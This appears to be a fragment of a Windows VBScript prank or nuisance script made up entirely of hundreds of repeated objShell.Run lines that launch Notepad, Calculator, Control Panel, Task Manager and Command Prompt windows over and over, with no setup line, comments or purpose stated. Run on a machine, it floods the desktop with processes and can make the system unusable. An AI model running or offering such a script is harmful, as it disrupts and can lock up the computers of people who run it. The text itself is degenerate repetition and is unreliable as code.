objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
